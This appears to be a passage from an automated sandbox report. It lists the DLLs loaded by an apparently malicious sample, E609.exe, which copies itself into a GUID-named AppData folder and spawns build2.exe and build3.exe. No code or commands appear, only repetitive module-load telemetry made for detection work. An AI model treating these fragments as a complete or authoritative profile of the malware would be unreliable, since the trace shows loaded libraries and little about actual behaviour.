Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: browcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: drprov.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: ntlanman.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: davclnt.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: davhlpr.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: browcli.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Section loaded: ncrypt.dll
